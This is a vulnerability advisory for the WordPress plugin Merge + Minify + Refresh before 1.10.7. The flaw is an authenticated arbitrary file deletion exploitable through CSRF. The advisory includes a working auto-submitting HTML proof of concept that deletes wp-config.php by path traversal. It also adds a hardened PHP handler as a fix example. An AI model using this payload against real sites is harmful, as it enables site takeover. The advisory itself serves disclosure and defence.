Merge + Minify + Refresh < 1.10.7 - Authenticated Arbitrary File Delete
Description
When deleting files, the plugin relied only on the is_admin() check, which merely indicates that the request was made to an admin screen (admin-ajax.php included) and says nothing about who is making it; the user's capabilities were never checked.

The functionality was also vulnerable to Cross-site Request Forgery (CSRF) allowing attackers to delete arbitrary files by tricking authenticated users into visiting a page they controlled.

In WordPress, if the wp-config.php file is deleted, it triggers the installation process, allowing an attacker to re-install WordPress and become admin.

Proof of Concept
    <html>
    <body>
    <form id="form" action="https://temporarycopy.local/wp-admin/admin-ajax.php" method="post">
    <input type="hidden" name="action" value="mmr_files"/>
    <input type="hidden" name="purge" value="../../wp-config.php"/>
    </form>
    <script>document.form.submit();</script>
    </body>
    </html>
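The description above names two missing controls: a capability check (is_admin() is not one) and CSRF protection, on top of the path traversal that lets "purge" reach outside the plugin's own cache directory. The following handler is an added example of how such an AJAX purge endpoint is normally hardened in WordPress; it is not the plugin's code or its actual fix, and the hook name, the nonce action 'mmr_purge', the 'nonce' request field and the MMR_CACHE_DIR constant are assumptions for illustration.

```php
<?php
// Added example, not the plugin's own code. Assumed: the action name 'mmr_files'
// from the PoC, a nonce action 'mmr_purge', a 'nonce' POST field, and a constant
// MMR_CACHE_DIR pointing at the directory whose files the plugin may delete.

add_action( 'wp_ajax_mmr_files', 'mmr_secure_purge' );

function mmr_secure_purge() {
    // 1. Authorization. is_admin() is true for any admin-ajax.php request, even
    //    from a subscriber, so ask for a real capability instead.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 2. CSRF. The nonce is bound to the action and the logged-in user; a form on
    //    an attacker-controlled page cannot supply a valid one. The client obtains
    //    it via wp_create_nonce( 'mmr_purge' ). check_ajax_referer() dies on failure.
    check_ajax_referer( 'mmr_purge', 'nonce' );

    // 3. Path confinement. Reduce the request to a bare file name, resolve it
    //    inside the cache directory, and confirm the resolved path stays there.
    $cache_dir = realpath( MMR_CACHE_DIR );
    $requested = isset( $_POST['purge'] ) ? wp_unslash( $_POST['purge'] ) : '';
    $target    = realpath( $cache_dir . DIRECTORY_SEPARATOR . basename( $requested ) );

    if ( false === $cache_dir || false === $target
        || 0 !== strpos( $target, $cache_dir . DIRECTORY_SEPARATOR ) ) {
        wp_send_json_error( 'invalid file', 400 );
    }

    wp_delete_file( $target );
    wp_send_json_success( basename( $target ) );
}
```

With these checks in place the PoC form above fails twice over: it carries no nonce, so check_ajax_referer() rejects it, and even a logged-in administrator who is tricked into submitting it could not reach "../../wp-config.php", because basename() strips the directory part and the realpath() comparison refuses anything that resolves outside the cache directory.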

Affects Plugin

Fixed in version 1.10.8

References

URL https://wearetradecraft.com/advisories/tc-2020-0002/
URL https://plugins.trac.wordpress.org/changeset/2234960/merge-minify-refresh

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Original Researcher Glyn Wintle (Tradecraft)
Verified No
WPVDB ID 10120

Timeline

Publicly Published 2020-02-05
Added 2020-03-09
Last Updated 2020-03-10
